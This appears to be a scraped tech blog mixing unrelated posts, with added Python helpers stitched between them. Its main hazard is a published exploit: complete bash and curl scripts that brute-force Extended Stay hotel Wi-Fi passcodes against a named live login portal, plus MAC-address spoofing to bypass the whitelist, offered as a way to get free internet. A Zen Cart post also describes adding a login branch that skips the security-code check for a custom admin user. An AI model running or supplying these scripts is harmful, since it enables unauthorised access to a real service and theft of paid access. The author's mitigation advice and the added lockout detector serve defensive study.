ubuntu lamp test in a jiffy

apt-get install php5 mysql-server php5-mysql apache2

Extended Stay of America passcode cracker

# Exploit Title: Guestek / Oneview - Extended Stay 5 dollar crack
# Date: 2012-01-04 ( The end is near!! )
# Author: Skraps, Jackie Craig Sparks (jackie.craig.sparks(at)live.com, jackie.craig.sparks(at)gmail.com, @skraps_foo)
# Software Link: https://login.globalsuite.net
# Version: 2 (tested), same idea works on older systems
# Spamvertise: https://www.facebook.com/Boycottcpanel - Join the boycott

This is a popular login system for Extended Stay of America hotels. Basically, ever since I was 21 they have always started their passcodes with the letter D. They are also 4 characters in length and always in uppercase letters. So that leaves us with a little less than 45000 possibilities for the passcode. The Guestek system also does not protect against brute force attacks. So with the fail script below, in a matter of 3-4 hours or less, we can slam it with 10-15 passcodes a second without degrading system performance. Then at some point within the 4 hours we have free internet.

They also use MAC address whitelisting, so the code changed on Jan 1st, but I've still been able to connect since then during my testing by changing my MAC address.

The solution: use stronger passcodes, and also add brute-force protection so that after 20 failed attempts (I have made over 100k while testing) the MAC address is blocked; set a cookie with a code as well so the web app knows not to allow access to the login prompt. Make the MAC address whitelist clear after 24 hours and use a cookie on the client's box to verify the user before adding them back to the MAC whitelist.
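The lockout the paragraph above asks for (block a client after 20 failed attempts, forget it after 24 hours) can also be checked after the fact against the portal's own logs. The following is an added example and not the author's or Guestek's code: the log line format, the use of the client MAC as the identity key, and the ok/invalid result token are all assumptions constructed for it.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Assumed portal log format, constructed for this example (not Guestek's own):
#   <ISO-8601 timestamp> <client MAC> POST /v2/globalnet/ProcessPasscode <ok|invalid>
LOG_LINE = re.compile(
    r"^(?P<ts>\S+) (?P<mac>(?:[0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}) "
    r"POST /v2/globalnet/ProcessPasscode (?P<result>ok|invalid)$"
)

def parse_line(line):
    """Parse one log line; return None for lines that do not match the format."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]),
            "mac": m["mac"].lower(),
            "result": m["result"]}

def failures_per_client(lines):
    """Total failed passcode submissions per client MAC."""
    counts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec and rec["result"] == "invalid":
            counts[rec["mac"]] += 1
    return counts

def clients_to_block(lines, threshold=20, window=timedelta(hours=24)):
    """MACs that reach `threshold` failures inside any sliding `window`.
    The defaults follow the post: block after 20 failures, with a 24-hour
    window so the block ages out together with the whitelist."""
    failures = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["result"] == "invalid":
            failures[rec["mac"]].append(rec["ts"])
    blocked = set()
    for mac, stamps in failures.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            # Slide the window start forward until the span fits inside `window`.
            while ts - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                blocked.add(mac)
                break
    return blocked

def build_sample_log():
    """Constructed sample: a guest mistypes twice then succeeds, while a
    second client fires 25 guesses at roughly 10 per second."""
    base = datetime(2012, 1, 4, 22, 0, 0)
    guest, guesser = "aa:bb:cc:dd:ee:01", "AA:BB:CC:DD:EE:02"
    path = "POST /v2/globalnet/ProcessPasscode"
    lines = [
        f"{base.isoformat()} {guest} {path} invalid",
        f"{(base + timedelta(seconds=30)).isoformat()} {guest} {path} invalid",
        f"{(base + timedelta(seconds=45)).isoformat()} {guest} {path} ok",
        "garbage line that the parser must skip",
    ]
    for i in range(25):
        ts = base + timedelta(milliseconds=100 * i)
        lines.append(f"{ts.isoformat()} {guesser} {path} invalid")
    return lines

if __name__ == "__main__":
    sample = build_sample_log()
    print(failures_per_client(sample))
    print("block:", clients_to_block(sample))
```

The sliding window matters: a guest who mistypes the code twice over a minute never comes near the threshold, while a client submitting several guesses a second crosses it within seconds, which is the pattern the script below produces.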

--PoC--

The script needs curl (curl.haxx.se) and John the Ripper (http://www.openwall.com/john).

Usage: ./oneview.sh, then just wait.

oneview.sh:

#!/bin/bash
# Fetch the login page once up front.
curl -s --location https://login.globalsuite.net/v2/Login
count=0
pcount=0
pmax=30   # upper bound on concurrent curl processes before pausing
[ ! -e ./oneviewdebug ] && mkdir debug
[ -e ./oneviewpass ] && rm oneviewpass
# john emits alphanumeric candidates up to 3 characters; tr uppercases them
for a in `john --incremental:alnum --stdout:3 | tr '[a-z]' '[A-Z]'`;do
    if [ ${#a} -gt 2 ]; then
        # prefix the fixed leading D and test the candidate in the background
        ./curloneview.sh D${a} &
        count=$(($count + 1))
        pcount=`ps aux | grep curl | wc -l`
        if (( $pcount > $pmax )); then
            sleep 2
        fi
        # curloneview.sh writes ./oneviewpass when a response is not rejected
        if [ -e ./oneviewpass ];then
            echo "Password found";
            cat ./oneviewpass
            rm -fr ./oneviewdebug
            exit
        fi
    fi
done
[ -e ./debug ] && rm -fr ./oneviewdebug

--EOF--

curloneview.sh:

#!/bin/bash
pass="$1";
echo -ne "Trying ${pass} \r"

# Submit one passcode to the portal and save the response for inspection.
function curlit(){
    curl -s -d "passcode=${pass}&firstname=joe&lastname=swanson&companyname=help%40juno.com" --output "./oneviewdebug/${pass}output.txt" --referer https://login.globalsuite.net/v2/Login --location https://login.globalsuite.net/v2/globalnet/ProcessPasscode
}

# Any response that lacks the "Invalid passcode" marker is treated as a hit.
function chkpass(){
    chk=`grep "#alert-error#_#AJAX#_# Invalid passcode entered" ./oneviewdebug/${pass}output.txt`
    if [ "$chk" != "#alert-error#_#AJAX#_# Invalid passcode entered" ];then
        echo "Password is ${pass}"
        echo ${pass} > ./oneviewpass
    fi
}

# Keep retrying until an output file exists for this candidate.
while [ ! -e "./oneviewdebug/${pass}output.txt" ]; do
    curlit
done
chkpass

auto updating product lists in zen cart

I just finished a small job updating a Zen Cart database with products from a wholesaler. The client already had a script that was built to manipulate the data directly in the database. I really didn't want to mess with the database directly and thought it might be better to just use the easy update plugin for Zen Cart.

Well, during this process I realized that the products did not match the layout for Easy Populate, so then we had to convert the CSV file.

Well after converting the script file I tried logging into zen cart and it failed every time even when scraping the security code from the login. So I screwed around with that for a couple of hours just fiddling finger effing my keyboard.

Then I decided to take a look at how easy-populate works; it turns out that Zen plugins are really easy. The script accepts POST data for the upload directly and can run independently from the admin interface.

I didn't want to thwart the security setup of Zen Cart, so I added an extra user with an admin_id of 999.

Then I proceeded to mod the login: I placed the security-code if statement below the username and password checks, then a custom if statement between the two that included the easypopulate.php file and exited right afterwards.

Now when logging in with my custom user with the admin_id of 999 it loaded easy-populate. So now I was able to use curl to POST the login data and the newly converted CSV file to easy populate so it can insert and update the products.

It was a task; it took 3 days to complete all in all. I'm sure if I was a more skilled developer this would have been done in a day or 2, not counting all the walks I took to refocus.

I will be posting the code on Google Code shortly, after I'm satisfied with it. There are still some debugging features.

Currently it encrypts the config information with AES-256 and has a web UI for importing and updating. Yeah, it's stooopid 😉

WordPress wp-sentinel htaccess work

I've been working on WordPress security here lately. I have been trying to combine the bullet-proof and wp-sentinel plugins together. I feel wp-sentinel is far superior to bullet-proof because it actually bans intruders instead of rewriting their URL to a safe URL, and a lot of the canned rules wp-sentinel already takes care of. So in addition to having Options -Indexes in the .htaccess, why not also block people who are intentionally trying to peek into the directories.

So I threw together these rules to use with wp-sentinel and also borrowed some from bullet-proof.

# DO NOT SHOW DIRECTORY LISTING
# If you are getting 500 Errors when activating BPS then comment out Options -Indexes
# by adding a # sign in front of it. If there is a typo anywhere in this file you will also see 500 errors.
Options -Indexes

RewriteEngine On
RewriteBase /

# Rewrite anyone who is trying to snoop into the directories so the request gets logged by wp-sentinel.
# A RewriteCond guards only the single RewriteRule that follows it, so the
# "not an existing file" check below applies to the dirblock1 rule alone.
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^([^/.]+)/?$ /?s=../../dirblock1 [R=301,L]
RewriteRule ^([^/.]+)/([^/.]+)/?$ /?s=../../dirblock2 [R=301,L]
RewriteRule ^([^/.]+)/([^/.]+)/([^/.]+)/?$ /?s=../../dirblock3 [R=301,L]
RewriteRule ^([^/.]+)/([^/.]+)/([^/.]+)/([^/.]+)/?$ /?s=../../dirblock4 [R=301,L]
RewriteRule ^([^/.]+)/([^/.]+)/([^/.]+)/([^/.]+)/([^/.]+)/?$ /?s=../../dirblock5 [R=301,L]

# BLOCK HOTLINKING TO IMAGES
# To test that your hotlinking protection is working visit http://altlab.com/htaccess_tutorial.html
RewriteCond %{HTTP_REFERER} !^https?://(www\.)?raskitchen\.com [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteRule .*\.(jpeg|jpg|gif|bmp|png)$ - [F]
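To see which requests the dirblock and hotlink rules above actually catch, here is an added Python check (not part of the post, of wp-sentinel, or of bullet-proof) that runs the same regular expressions over sample request paths. The is_file flag is an assumed stand-in for the %{REQUEST_FILENAME} -f condition; everything else is lifted from the rules as written.

```python
import re

# The five dirblock rules from the .htaccess above, in order, with the
# search-string URL each one redirects to.  Apache's PCRE and Python's re
# agree for these expressions.
DIRBLOCK_RULES = [
    (re.compile(r"^([^/.]+)/?$"), "/?s=../../dirblock1"),
    (re.compile(r"^([^/.]+)/([^/.]+)/?$"), "/?s=../../dirblock2"),
    (re.compile(r"^([^/.]+)/([^/.]+)/([^/.]+)/?$"), "/?s=../../dirblock3"),
    (re.compile(r"^([^/.]+)/([^/.]+)/([^/.]+)/([^/.]+)/?$"), "/?s=../../dirblock4"),
    (re.compile(r"^([^/.]+)/([^/.]+)/([^/.]+)/([^/.]+)/([^/.]+)/?$"), "/?s=../../dirblock5"),
]

def dirblock_target(request_path, is_file=False):
    """Redirect target the dirblock rules pick for a request, or None.

    `request_path` is the per-directory form mod_rewrite hands to .htaccess
    rules (no leading slash).  `is_file` is an assumed stand-in for
    %{REQUEST_FILENAME} -f; since a RewriteCond guards only the RewriteRule
    directly after it, only the first rule consults it."""
    for index, (pattern, target) in enumerate(DIRBLOCK_RULES):
        if index == 0 and is_file:
            continue
        if pattern.match(request_path):
            return target
    return None

# Hotlink rules: the allowed referer is matched case-insensitively ([NC]),
# an empty referer is let through (!^$), and the image pattern carries no
# [NC] so the extension check is case-sensitive.
HOTLINK_ALLOWED = re.compile(r"^https?://(www\.)?raskitchen\.com", re.IGNORECASE)
IMAGE_REQUEST = re.compile(r".*\.(jpeg|jpg|gif|bmp|png)$")

def hotlink_forbidden(request_path, referer):
    """True if the hotlink rules would answer 403 for this request."""
    if not IMAGE_REQUEST.match(request_path):
        return False
    if referer == "":
        return False
    return HOTLINK_ALLOWED.match(referer) is None

if __name__ == "__main__":
    for path in ("wp-admin/", "about/", "wp-content/uploads/2012/01/",
                 "wp-content/uploads/2012/01/photo.jpg", "a/b/c/d/e/f/"):
        print(f"{path:45} -> {dirblock_target(path)}")
    print(hotlink_forbidden("images/logo.png", "http://other.example/"))
```

Two things the check makes visible: a WordPress pretty permalink such as about/ matches the dirblock1 pattern just like wp-admin/ does, so on a site with pretty permalinks the order of these rules relative to WordPress's own rewrite rules matters; and a request for photo.PNG slips past the hotlink rule because its pattern is case-sensitive, which a [NC] flag on that RewriteRule would close.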

Missing group and user names when running ls -l or chown reports user missing

Missing user and group names in a chroot: you need the files below. First, is the user in /etc/passwd and /etc/group inside the jail?

Are these files inside the jail?
/etc/nsswitch.conf
/lib/i386-linux-gnu/libnss_files.so.2
/lib/i386-linux-gnu/libnss_nis.so.2
/lib/i386-linux-gnu/libnsl.so.1
/lib/i386-linux-gnu/libnss_compat.so.2
/lib/i386-linux-gnu/libattr.so.1
/lib/i386-linux-gnu/libpthread.so.0
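The list above is easy to check by hand once, but a jail gets rebuilt and libraries get updated, so here is an added Python checker (not from the post or from jailkit) that reports which of those files are absent from a jail root and whether a user is defined in the jail's own passwd and group. The sample jail it builds in a temp directory is constructed for the example; the file list and the i386 multiarch paths are the post's own.

```python
import os
import tempfile

# Files the post lists as required inside the jail for name resolution
# (i386 multiarch paths as given; on x86_64 the same libraries live under
# /lib/x86_64-linux-gnu).
JAIL_NSS_FILES = [
    "/etc/nsswitch.conf",
    "/lib/i386-linux-gnu/libnss_files.so.2",
    "/lib/i386-linux-gnu/libnss_nis.so.2",
    "/lib/i386-linux-gnu/libnsl.so.1",
    "/lib/i386-linux-gnu/libnss_compat.so.2",
    "/lib/i386-linux-gnu/libattr.so.1",
    "/lib/i386-linux-gnu/libpthread.so.0",
]

def in_jail(jail_root, path):
    """Map an absolute in-jail path onto the host filesystem."""
    return os.path.join(jail_root, path.lstrip("/"))

def jail_missing_nss(jail_root):
    """Return the subset of JAIL_NSS_FILES that is absent from the jail."""
    return [f for f in JAIL_NSS_FILES if not os.path.exists(in_jail(jail_root, f))]

def jail_has_user(jail_root, user):
    """True if `user` is in BOTH the jail's own passwd and group files,
    which is what ls -l and chown resolve names against once chrooted."""
    def listed_in(rel_path):
        try:
            with open(in_jail(jail_root, rel_path)) as fh:
                return any(line.split(":")[0] == user for line in fh if line.strip())
        except FileNotFoundError:
            return False
    return listed_in("etc/passwd") and listed_in("etc/group")

def build_sample_jail(jail_root):
    """Constructed sample jail: nsswitch.conf and libnss_files present, the
    other libraries missing; only 'alice' is defined in passwd and group."""
    os.makedirs(in_jail(jail_root, "etc"), exist_ok=True)
    os.makedirs(in_jail(jail_root, "lib/i386-linux-gnu"), exist_ok=True)
    for f in ("/etc/nsswitch.conf", "/lib/i386-linux-gnu/libnss_files.so.2"):
        open(in_jail(jail_root, f), "w").close()
    with open(in_jail(jail_root, "etc/passwd"), "w") as fh:
        fh.write("alice:x:1000:1000::/home/alice:/bin/sh\n")
    with open(in_jail(jail_root, "etc/group"), "w") as fh:
        fh.write("alice:x:1000:\n")

def demo():
    """Build the sample jail in a temp dir and report what the checks find."""
    with tempfile.TemporaryDirectory() as jail:
        build_sample_jail(jail)
        return {
            "missing": jail_missing_nss(jail),
            "alice": jail_has_user(jail, "alice"),
            "bob": jail_has_user(jail, "bob"),
        }

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        # Check a real jail root, e.g. the one jailkit created.
        for f in jail_missing_nss(sys.argv[1]):
            print("missing:", f)
    else:
        print(demo())
```

Run it with the jail root as the argument to audit a real jail; with no argument it exercises the constructed sample. A name that resolves on the host but not in the jail is the usual reason ls -l shows numeric ids after chrooting.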

They see ya Chrootin , they be hate ‘n

Ok, I've been playing with chrooting and jails for the past 2 days. I used jailkit (olivier.sessink.nl/jailkit/) to create an extended jail for users, and also combined an idea found on this blog http://0x80.org/blog/?p=13 and http://antitese.org/sshjail/downloads/openssh-5.2p1-sshjail.patch. I managed to get it to work and create a small shell environment for users. Then I started playing and trying to chroot the sshd daemon inside the jail too. After getting the NIS and other libraries moved (hardlinked) into the jail, I ran into a problem with the privsep user setup. It's trying to write to /var/empty and doesn't have sufficient privileges after running the daemon through the chrootuid command, so it cannot write to the directory and then it cannot bind to a port, because it swaps to the unprivileged user before the nitty-gritty work is done. I'm beginning to think this isn't going to happen and I would need to leave sshd outside the jail.

The idea was to keep an ssh daemon on the main system running on a high-numbered port (e.g. 2222) and then have the chrooted sshd running on 22, which would take advantage of rssh and restrict the users directly to their home directories to create a "simple" shared hosting environment that takes advantage of extra security features.

Layout of what I think would be a good structure for a shared host:

Server Base (fail2ban, sshd, tripwire, fwsnort, fwknop)
|
|\_______ Jail 1: MySQL w/ bigtables and SSL enabled (local socket does not work, but TCP would)
|
|\_______ Jail 2: sshd+rssh, httpd, php, sftp
|
|\_______ Jail 3: MySQL (administration database): user account info and mail (vpopmail)
|
|\_______ Jail 4: httpd, php (administration panel)
|
|\_______ Jail 5: Qmail + vpopmail binaries
|
 \_______ Jail 6: Tinydns (only 1 security issue ever found)

Enabling secure searches with firefox search bar

Ok, in the past 6 months Google has started to offer SSL to users of their search engine. I just reinstalled my laptop, and when I used the search bar it brought me to a regular http Google search page. Hmm... it's time to change this.

First we need to locate the Firefox install directory, then look inside the searchplugins/en-US directory and open up the search provider. In my case it was google.xml, so the full path is "/usr/lib/firefox-7.0.1/searchplugins/en-US/google.xml". Change all the references of http to https.

An easy way to do this is an in-place sed edit. (Piping cat into sed and redirecting back onto the same file does not work: the shell truncates the file before cat reads it, and the redirect runs without sudo anyway. Matching "http://" rather than bare "http" also avoids turning an existing https into httpss.)

sudo sed -i 's#http://#https://#g' /usr/lib/firefox-7.0.1/searchplugins/en-US/google.xml

Restart firefox and go https!

Build a tor array or a army?

I was playing with some code in order to test psad (port scan attack detector) and some other stuff. I didn't have extra servers at my disposal, so I decided to use the Tor network to perform my testing with. This is done in bash for Linux and needs to be in the /etc/tor directory. Better yet, read the code before you run it to make sure it doesn't mess anything up on your system; a lot of people have their systems configured differently. Tor build project page

phpBB AES

Here's a mod of phpBB that stores the user password in the database and encrypts it with AES. phpBB AES


WordPress AES

I've been working on implementing AES encryption into the WordPress core. I have a working example hosted on Google Code at the moment. It's missing some features and there's more to be added, but here is a link to the code: WordPress AES edition. In no way am I trying to deface the security of WordPress; I just would like to see them add these functions into the code base.